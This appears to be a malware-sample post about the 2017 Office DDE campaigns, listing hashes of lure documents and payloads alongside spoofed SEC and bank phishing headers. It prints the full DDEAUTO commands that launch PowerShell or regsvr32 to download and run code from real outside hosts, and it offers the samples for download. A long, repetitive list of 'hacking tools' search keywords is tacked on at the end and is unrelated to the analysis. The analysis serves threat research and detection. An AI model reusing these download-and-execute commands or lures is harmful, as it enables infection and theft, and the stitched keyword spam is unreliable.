DDE Command Execution Malware Samples

Here are a few samples related to the recent DDE Command execution

DDE Macro-less Command Execution Vulnerability

 Download. Email me if you need the password  (updated sample pack)

Links updated: Jan 20, 2023

References

Reading:
10/18/2017 InQuest/yara-rules 

10/18/2017 Inquest: Microsoft Office DDE Macro-less Command Execution Vulnerability

10/18/2017 Inquest: Microsoft Office DDE Vortex Ransomware Targeting Poland

10/16/2017 https://twitter.com/noottrak/status/919975081828261888

10/14/2017 Inquest: Microsoft Office DDE Freddie Mac Targeted Lure 

10/14/2017 Inquest: Microsoft Office DDE SEC OMB Approval Lure

10/12/2017 NViso labs: YARA DDE rules: DDE Command Execution observed in-the-wild 

10/11/2017 Talos:Spoofed SEC Emails Distribute Evolved DNSMessenger 

10/10/2017  NViso labs: MS Office DDE YARA rules

10/09/2017 Sensepost: Macro-less Code Exec in MSWord

File information

List of available files:
Word documents:
bf38288956449bb120bae525b6632f0294d25593da8938bbe79849d6defed5cb
a1294fce91af3f7e7691f8307d07aebd4636402e4e6a244faac5ac9b36f8428
b68b3f98f78b42ac83e356ad61a4d234fe620217b250b5521587be49958d568
9d67659a41ef45219ac64967b7284dbfc435ee2df1fccf0ba9c7464f03fdc862
7777ccbaaafe4e50f800e659b7ca9bfa58ee7eefe6e4f5e47bc3b38f84e52280
313fc5bd8e1109d35200081e62b7aa33197a6700fc390385929e71aabbc4e065
9fa8f8ccc29c59070c7aac94985f518b67880587ff3bbfabf195a3117853984d
8630169ab9b4587382d4b9a6d17fd1033d69416996093b6c1a2ecca6b0c04184
11a6422ab6da62d7aad4f39bed0580db9409f9606e4fa80890a76c7eabfb1c13
bd61559c7dcae0edef672ea922ea5cf15496d18cc8c1cbebee9533295c2d2ea9

Payload 
8c5209671c9d4f0928f1ae253c40ce7515d220186bb4a97cbaf6c25bd3be53cf
2330bf6bf6b5efa346792553d3666c7bc290c98799871f5ff4e7d44d2ab3b28c
316f0552684bd09310fc8a004991c9b7ac200fb2a9a0d34e59b8bbd30b6dc8ea
5d3b34c963002bd46848f5fe4e8b5801da045e821143a9f257cb747c29e4046f
fe72a6b6da83c779787b2102d0e2cfd45323ceab274924ff617eb623437c2669 

File details with MD5 hashes:

Word documents:
1. bf38288956449bb120bae525b6632f0294d25593da8938bbe79849d6defed5cb EDGAR_Rules.docx
bcadcf65bcf8940fff6fc776dd56563 ( DDEAUTO c:\\windows\\system32\\cmd.exe "/k powershell -C ;echo \"https://sec.gov/\";IEX((new-object net.webclient).downloadstring('https://pastebin.com/raw/pxSE2TJ1')) ")

2. 1a1294fce91af3f7e7691f8307d07aebd4636402e4e6a244faac5ac9b36f8428 EDGAR_Rules_2017.docx
 2c0cfdc5b5653cb3e8b0f8eeef55fc32 ( DDEAUTO c:\\windows\\system32\\cmd.exe "/k powershell -C ;echo \"https://sec.gov/\";IEX((new-object net.webclient).downloadstring('https://trt.doe.louisiana.gov/fonts.txt')) ")

3 4b68b3f98f78b42ac83e356ad61a4d234fe620217b250b5521587be49958d568 SBNG20171010.docx
8be9633d5023699746936a2b073d2d67 (DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://104.131.178.222/s.ps1');powershell -Command $e. 

4. 9d67659a41ef45219ac64967b7284dbfc435ee2df1fccf0ba9c7464f03fdc862 Plantilla - InformesFINAL.docx
78f07a1860ae99c093cc80d31b8bef14 ( DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe $e=new-object -com internetexplorer.application; $e.visible=$true; $e.navigate2(' https://i.ytimg.com/vi/ErLLFVf-0Mw/maxresdefault.jpg '); powershell -e $e " 

5. 7777ccbaaafe4e50f800e659b7ca9bfa58ee7eefe6e4f5e47bc3b38f84e52280 
 aee33500f28791f91c278abb3fcdd942 (DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://www.filefactory.com/file/2vxfgfitjqrf/Citibk_MT103_Ref71943.exe');powershell -e_

6. 313fc5bd8e1109d35200081e62b7aa33197a6700fc390385929e71aabbc4e065 Giveaway.docx
507784c0796ffebaef7c6fc53f321cd6 (DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord.exe\\..\\..\\..\\..\\windows\\system32\\cmd.exe" "/c regsvr32 /u /n /s /i:\"h\"t\"t\"p://downloads.sixflags-frightfest.com/ticket-ids scrobj.dll" "For Security Reasons")


7. 9fa8f8ccc29c59070c7aac94985f518b67880587ff3bbfabf195a3117853984d  Filings_and_Forms.docx
47111e9854db533c328ddbe6e962602a (DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord.exe\\..\\..\\..\\..\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -sta -NonI -W Hidden -C $e=(new-object system.net.webclient).downloadstring('http://goo.gl/Gqdihn');powershell.exe -e $e # " "Filings_and_Forms.docx")

8. 8630169ab9b4587382d4b9a6d17fd1033d69416996093b6c1a2ecca6b0c04184 ~WRD0000.tmp
47111e9854db533c328ddbe6e962602a


9. 11a6422ab6da62d7aad4f39bed0580db9409f9606e4fa80890a76c7eabfb1c13 ~WRD0003.tmp
d78ae3b9650328524c3150bef2224460


10. bd61559c7dcae0edef672ea922ea5cf15496d18cc8c1cbebee9533295c2d2ea9 DanePrzesylki17016.doc
5786dbcbe1959b2978e979bf1c5cb450


Payload Powershell

1. 8c5209671c9d4f0928f1ae253c40ce7515d220186bb4a97cbaf6c25bd3be53cf fonts.txt

2 2330bf6bf6b5efa346792553d3666c7bc290c98799871f5ff4e7d44d2ab3b28c - powershell script from hxxp://citycarpark.my/components/com_admintools/mscorier

Payload PE

1. 316f0552684bd09310fc8a004991c9b7ac200fb2a9a0d34e59b8bbd30b6dc8ea Citibk_MT103_Ref71943.exe
3a4d0c6957d8727c0612c37f27480f1e

2. 5d3b34c963002bd46848f5fe4e8b5801da045e821143a9f257cb747c29e4046f FreddieMacPayload
 4f3a6e16950b92bf9bd4efe8bbff9a1e

3. fe72a6b6da83c779787b2102d0e2cfd45323ceab274924ff617eb623437c2669 s50.exe  Poland payload
09d71f068d2bbca9fac090bde74e762b

Message information

For the EDGAR campaign
bf38288956449bb120bae525b6632f0294d25593da8938bbe79849d6defed5cb

 Received: from usa2.serverhoshbilling.com (usa2.serverhoshbilling.com [209.90.232.236])

by m0049925.ppops.net with ESMTP id 2dhb488ej6-1

(version=TLSv1.2 cipher=ECDHE-RSA-AES256-GCM-SHA384 bits=256 verify=NOT)

for <snip>; Wed, 11 Oct 2017 00:09:20 -0400

Received: from salesapo by usa2.serverhoshbilling.com with local (Exim 4.89)

(envelope-from <EDGAR@sec.gov>)

id 1e28HE-0001S5-Ew

for <snip>; Wed, 11 Oct 2017 00:05:48 -0400

To: <snip>

Subject: EDGAR Filings

X-PHP-Script: roofingexperts.org/wp-content/themes/sp/examples/send_edgar_corps.php for 89.106.109.106, 162.158.90.75

X-PHP-Originating-Script: 658:class.phpmailer.php

Date: Wed, 11 Oct 2017 04:05:48 +0000

From: EDGAR <EDGAR@sec.gov>

Reply-To: EDGAR <EDGAR@sec.gov>

Message-ID: <7608a3de5fe6c9bf7df6782a8aa9790f@roofingexperts.org>

X-Mailer: PHPMailer 5.2.22 (https://github.com/PHPMailer/PHPMailer)

MIME-Version: 1.0

Content-Type: multipart/mixed;

boundary="b1_7608a3de5fe6c9bf7df6782a8aa9790f"

Content-Transfer-Encoding: 8bit

X-AntiAbuse: This header was added to track abuse, please include it with any abuse report

X-AntiAbuse: Primary Hostname - usa2.serverhoshbilling.com

X-AntiAbuse: Original Domain - nu.com

X-AntiAbuse: Originator/Caller UID/GID - [658 497] / [47 12]

X-AntiAbuse: Sender Address Domain - sec.gov

X-Get-Message-Sender-Via: usa2.serverhoshbilling.com: authenticated_id: salesapo/only user confirmed/virtual account not confirmed

X-Authenticated-Sender: usa2.serverhoshbilling.com: salesapo

X-Source: /opt/cpanel/ea-php56/root/usr/bin/lsphp

X-Source-Args: lsphp:ntent/themes/sp/examples/send_edgar_corps.php

X-Source-Dir: salesapogee.com:/roofingexperts/wp-content/themes/sp/examples

X-CLX-Shades: Junk

X-CLX-Response: <snip>

X-Proofpoint-Virus-Version: vendor=fsecure engine=2.50.10432:,, definitions=2017-10-10_08:,,

 signatures=0

X-Proofpoint-Spam-Details: rule=spam policy=default score=99 priorityscore=1501 malwarescore=0

 suspectscore=0 phishscore=0 bulkscore=0 spamscore=0 clxscore=-262

 lowpriorityscore=0 impostorscore=0 adultscore=0 classifier=clx:Junk

 adjust=0 reason=mlx scancount=1 engine=8.0.1-1707230000

 definitions=main-1710110060

This is a multi-part message in MIME format.

--b1_7608a3de5fe6c9bf7df6782a8aa9790f

Content-Type: multipart/alternative;

boundary="b2_7608a3de5fe6c9bf7df6782a8aa9790f"

--b2_7608a3de5fe6c9bf7df6782a8aa9790f

Content-Type: text/plain; charset=us-ascii

Important information about last changes in EDGAR Filings

--b2_7608a3de5fe6c9bf7df6782a8aa9790f

Content-Type: text/html; charset=us-ascii

<b>Important information about last changes in EDGAR Filings</b><br/><br/>Attached document is directed to <snip>

--b2_7608a3de5fe6c9bf7df6782a8aa9790f--

--b1_7608a3de5fe6c9bf7df6782a8aa9790f

Content-Type: application/vnd.openxmlformats-officedocument.wordprocessingml.document; name="EDGAR_Rules_2017.docx"

Content-Transfer-Encoding: base64

Content-Disposition: attachment; filename=EDGAR_Rules_2017.docx

<snip>

--b1_7608a3de5fe6c9bf7df6782a8aa9790f--

for 4b68b3f98f78b42ac83e356ad61a4d234fe620217b250b5521587be49958d568 SBNG20171010.docx

Received: from VI1PR08MB2670.eurprd08.prod.outlook.com (10.175.245.20) by

 AM4PR08MB2659.eurprd08.prod.outlook.com (10.171.190.148) with Microsoft SMTP

 Server (version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P256) id

 15.20.77.7 via Mailbox Transport; Thu, 12 Oct 2017 10:45:16 +0000

Received: from DB6PR0802MB2600.eurprd08.prod.outlook.com (10.172.252.17) by

 VI1PR08MB2670.eurprd08.prod.outlook.com (10.175.245.20) with Microsoft SMTP

 Server (version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P256) id

 15.20.77.7; Thu, 12 Oct 2017 10:45:15 +0000

Received: from VI1PR0802CA0047.eurprd08.prod.outlook.com

 (2603:10a6:800:a9::33) by DB6PR0802MB2600.eurprd08.prod.outlook.com

 (2603:10a6:4:a2::17) with Microsoft SMTP Server (version=TLS1_2,

 cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P256) id 15.20.77.7; Thu, 12 Oct

 2017 10:45:14 +0000

Received: from DB3FFO11FD006.protection.gbl (2a01:111:f400:7e04::133) by

 VI1PR0802CA0047.outlook.office365.com (2603:10a6:800:a9::33) with Microsoft

 SMTP Server (version=TLS1_2,

 cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P256) id 15.20.77.7 via Frontend

 Transport; Thu, 12 Oct 2017 10:45:14 +0000

Received: from za-hybrid.mail.standardbank.com (147.152.120.47) by

 DB3FFO11FD006.mail.protection.outlook.com (10.47.216.95) with Microsoft SMTP

 Server (version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P384) id

 15.20.77.10 via Frontend Transport; Thu, 12 Oct 2017 10:45:12 +0000

Received: from <snip> (10.234.178.186) by

 <snip>(10.144.20.58) with Microsoft SMTP

 Server (TLS) id 14.3.339.0; Thu, 12 Oct 2017 12:44:35 +0200

Received: from <snip> (10.234.174.102) by

 <snip> with Microsoft SMTP Server

 id 8.3.389.2; Thu, 12 Oct 2017 11:43:42 +0100

Received: from cluster-a.mailcontrol.com (unknown [85.115.52.190]) by

 Forcepoint Email with ESMTPS id AC3EDEB6D852BD348649; Thu, 12 Oct 2017

 11:43:38 +0100 (CET)

Received: from rly14a.srv.mailcontrol.com (localhost [127.0.0.1]) by

 rly14a.srv.mailcontrol.com (MailControl) with ESMTP id v9CAhaCs039950; Thu,

 12 Oct 2017 11:43:36 +0100

Received: from localhost.localdomain (localhost.localdomain [127.0.0.1]) by

 rly14a.srv.mailcontrol.com (MailControl) id v9CAhaRp039947; Thu, 12 Oct 2017

 11:43:36 +0100

Received: from mx1.ssl-secure-mail.com (mx1.ssl-secure-mail.com

 [188.166.157.242]) by rly14a-eth0.srv.mailcontrol.com (envelope-sender

 <Emmanuel.Chatta@stadnardbank.co.za>) (MIMEDefang) with ESMTP id

 v9CAhZoc039719 (TLS bits=256 verify=NO); Thu, 12 Oct 2017 11:43:36 +0100

 (BST)

Received: from authenticated-user (mx1.ssl-secure-mail.com [188.166.157.242])

(using TLSv1 with cipher ECDHE-RSA-AES256-SHA (256/256 bits)) (No client

 certificate requested) by mx1.ssl-secure-mail.com (Postfix) with ESMTPSA id

 571CD1511D4; Thu, 12 Oct 2017 06:43:35 -0400 (EDT)

From: Emmanuel Chatta <Emmanuel.Chatta@stadnardbank.co.za>

To: <snip>

Subject: Document

Thread-Topic: Document

Thread-Index: AQHTQ0cx2UbfjWEaCEK0bdQsLAkUYA==

Date: Thu, 12 Oct 2017 10:43:35 +0000

Message-ID: <f8c34a32397e02274fd65930045f0204@ssl-secure-mail.com>

Content-Language: en-US

X-MS-Exchange-Organization-AuthSource: <snip>

X-MS-Has-Attach: yes

X-MS-TNEF-Correlator:

received-spf: Fail (protection.outlook.com: domain of <snip> does

 not designate 147.152.120.47 as permitted sender)

 receiver=protection.outlook.com; client-ip=147.152.120.47;

 helo=<snip>;

x-scanned-by: MailControl 44278.1987 (www.mailcontrol.com) on 10.65.1.124

x-mailcontrol-inbound: 4HEeExWtV!H1jiRXZJTT7wjEcFneOidAa+WVdv9sScH43ayzJcnLn4fvVkSq3YGx

x-ms-publictraffictype: Email

X-Microsoft-Exchange-Diagnostics: 1;AM4PR08MB2659;27:42C8MVC/6E4KnuK79xnDQihs/aWUnFSYSvMpUq/ZWFgliSK+uNXwEUaalqg0K4Ukdn7mPjI/6bOflK6H4WqZhQpH28iVAkhECXI6saRJPgqIf8Vn6JKx/rSyKhnUCz+c

Content-Type: multipart/mixed;

boundary="_002_f8c34a32397e02274fd65930045f0204sslsecuremailcom_"

MIME-Version: 1.0

Read more

1. Termux Hacking Tools 2019
2. Pentest Tools Github
3. Hacking App
4. Pentest Tools Review
5. Hacking Tools Hardware
6. Hacker Tools Free Download
7. Pentest Tools Linux
8. Pentest Tools Url Fuzzer
9. Hack Rom Tools
10. Hacker Hardware Tools
11. Pentest Tools For Windows
12. Tools Used For Hacking
13. Hacker Tools Apk Download
14. Hacking Tools 2019
15. Hacker Techniques Tools And Incident Handling
16. Pentest Tools For Mac
17. Hacker Tools 2019
18. Hacking Tools Download
19. Hacking Apps
20. Hack Tools For Windows
21. Hacking Tools And Software
22. Hack Tools Pc
23. Pentest Tools Github
24. Hacker Tools List
25. Hacker Tools Linux
26. Tools For Hacker
27. Hack Tools Pc
28. Free Pentest Tools For Windows
29. Hacking Tools Name
30. Pentest Box Tools Download
31. Hacking Tools For Pc
32. Pentest Tools Open Source
33. Hacking Tools Hardware
34. Hacker
35. Hack Tool Apk No Root
36. Hacker Tools 2019
37. Hacker Tools Online
38. New Hacker Tools
39. Hack Tools For Games
40. Nsa Hack Tools Download
41. Pentest Tools Alternative
42. Underground Hacker Sites
43. Hacking Tools Download
44. Hacker Security Tools
45. Github Hacking Tools
46. Pentest Tools List
47. Hacker Hardware Tools
48. Hack Apps
49. Nsa Hack Tools
50. Hack Tools Github
51. Hacking Tools For Windows
52. Hack Tool Apk No Root
53. Hack Tools For Ubuntu
54. Hack Tools
55. Best Pentesting Tools 2018
56. Hacking Tools Name
57. Hacking Tools Free Download
58. Hacker Tools 2019
59. Hacking Tools Software
60. Hacking Tools Online
61. Hak5 Tools
62. Pentest Tools Bluekeep
63. Hacker Tools Free Download
64. Hack Tools Online
65. Hacking Tools Windows 10
66. Tools For Hacker
67. Hacker Tools Apk
68. Ethical Hacker Tools
69. Usb Pentest Tools
70. Hackrf Tools
71. Pentest Tools Subdomain
72. Hacker Tools Online
73. Hack Rom Tools
74. Pentest Tools Linux
75. Hack Tool Apk
76. Hack Tools For Ubuntu
77. Hacking Tools Usb
78. Hacker Tools Mac
79. Hack Tools For Games
80. Hacking Tools
81. Hack Tools Online
82. Hack Apps
83. Tools Used For Hacking
84. Hacking Tools Mac
85. Pentest Tools Framework
86. Hacking Tools For Windows
87. How To Hack
88. Pentest Tools
89. Hacking Tools 2020
90. Hak5 Tools
91. Nsa Hack Tools
92. Pentest Tools Website Vulnerability
93. Hackrf Tools
94. Pentest Tools Review
95. Hacker Tools Apk Download
96. Hacking Tools And Software
97. How To Make Hacking Tools
98. Hacker Tools 2020
99. Tools For Hacker
100. Top Pentest Tools
101. Hacker Tools For Pc
102. Hacking Tools For Kali Linux
103. Pentest Tools Nmap
104. Best Hacking Tools 2019
105. Pentest Tools Free
106. Pentest Tools For Ubuntu
107. Github Hacking Tools
108. Hack Tools Github
109. Hacker Tools
110. Hack Tools Download
111. Free Pentest Tools For Windows
112. Pentest Tools Subdomain
113. Ethical Hacker Tools
114. Pentest Tools Online
115. Hacker
116. Best Pentesting Tools 2018
117. Hack App
118. Hacking Tools Free Download
119. Hack Tools 2019
120. Pentest Reporting Tools
121. Hack Tools
122. Pentest Tools Website
123. Hacker Tools Github
124. Hacking Tools For Mac
125. Hack Tools Mac
126. Hacker Tools Windows
127. Hacker Tools Online
128. Kik Hack Tools
129. Hacker Hardware Tools
130. Pentest Tools List
131. Hacking Tools 2019
132. Hack Tools For Games
133. Hacking Tools Pc
134. Hacking Apps
135. Pentest Tools For Mac
136. Pentest Recon Tools
137. Pentest Tools Review
138. Kik Hack Tools
139. Pentest Tools Linux
140. Usb Pentest Tools
141. Pentest Tools For Mac
142. Hacks And Tools
143. Nsa Hack Tools Download
144. Pentest Tools Review
145. Pentest Tools Website Vulnerability
146. Hacker Tools Github
147. Bluetooth Hacking Tools Kali
148. Hack Apps
149. Hack Tools For Pc
150. Pentest Tools For Mac
151. Hack And Tools
152. Hacking Tools
153. Pentest Tools List
154. Computer Hacker
155. Hack Website Online Tool
156. Hacking Tools Software
157. Pentest Tools Kali Linux
158. Game Hacking
159. Nsa Hack Tools Download
160. Pentest Tools Open Source
161. Hacking Tools For Windows Free Download
162. Hacking Tools
163. Best Pentesting Tools 2018
164. Termux Hacking Tools 2019
165. Growth Hacker Tools
166. Pentest Tools Github
167. Pentest Tools Free
168. Hacking Tools For Windows
169. Blackhat Hacker Tools
170. Physical Pentest Tools
171. Hacking Tools Windows 10
172. Hacker Tools Github
173. Hack Tools Github
174. How To Install Pentest Tools In Ubuntu